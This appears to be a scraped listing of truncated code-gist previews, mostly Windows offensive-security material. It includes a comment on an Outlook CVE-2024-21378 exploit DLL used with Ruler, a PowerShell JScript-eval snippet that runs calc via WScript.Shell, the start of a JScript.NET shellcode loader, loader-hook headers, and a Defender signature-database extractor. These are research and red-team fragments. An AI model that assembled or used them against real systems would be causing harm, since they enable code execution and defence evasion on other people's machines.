Standard escape codes are prefixed with Escape
:
- Ctrl-Key:
^[
- Octal:
\033
- Unicode:
\u001b
- Hexadecimal:
\x1B
- Decimal:
27
#!/usr/bin/env python | |
# Impacket - Collection of Python classes for working with network protocols. | |
# | |
# Copyright Fortra, LLC and its affiliated companies | |
# | |
# All rights reserved. | |
# | |
# This software is provided under a slightly modified version | |
# of the Apache Software License. See the accompanying LICENSE file | |
# for more information. |
/** | |
* This DLL is designed for use in conjunction with the Ruler tool for | |
* security testing related to the CVE-2024-21378 vulnerability, | |
* specifically targeting MS Outlook. | |
* | |
* It can be used with the following command line syntax: | |
* ruler [auth-params] form add-com [attack-params] --dll ./test.dll | |
* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch). | |
* | |
* After being loaded into MS Outlook, it sends the PC's hostname and |
filter Expand-DefenderAVSignatureDB { | |
<# | |
.SYNOPSIS | |
Decompresses a Windows Defender AV signature database (.VDM file). | |
.DESCRIPTION | |
Expand-DefenderAVSignatureDB extracts a Windows Defender AV signature database (.VDM file). This function was developed by reversing mpengine.dll and with the help of Tavis Ormandy and his LoadLibrary project (https://github.com/taviso/loadlibrary). Note: Currently, "scrambled" databases are not supported although, I have yet to encounter a scrambled database. Thus far, all databases I've encountered are zlib-compressed. |
{ | |
"targets": [ | |
{ | |
"target_name": "hello", | |
"sources": [ "hello.cc" ] | |
} | |
] | |
} |
#include <Windows.h> | |
#include <winternl.h> | |
// Types | |
using LdrProtectMrdata_t = void(__stdcall*)(int); | |
using LdrProtectMrdataHeap_t = void(__thiscall*)(int); | |
struct ExceptionRecord_t { | |
LIST_ENTRY entry; | |
int* unknown_intptr; |
#include <stdio.h> | |
#include <windows.h> | |
#include <winternl.h> | |
#define dwAllowDllCount 1 | |
CHAR cAllowDlls[dwAllowDllCount][MAX_PATH] = { | |
"W:\\allowed.dll" | |
}; | |
VOID HookLoadDll(LPVOID lpAddr); |
[Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript'); | |
$js = 'var js = new ActiveXObject("WScript.Shell");js.Run("calc");' | |
[Microsoft.JScript.Eval]::JScriptEvaluate($js,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()); |
import System; | |
import System.Runtime.InteropServices; | |
import System.Reflection; | |
import System.Reflection.Emit; | |
import System.Runtime; | |
import System.Text; | |
//C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js | |
//C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js | |
using System; | |
using System.Runtime.CompilerServices; | |
using System.Reflection; | |
using System.Reflection.Emit; | |
namespace FunkyJit | |
{ | |
class Program | |
{ | |
public static void Nothing() { Console.WriteLine(); } | |
static void Main(string[] args) |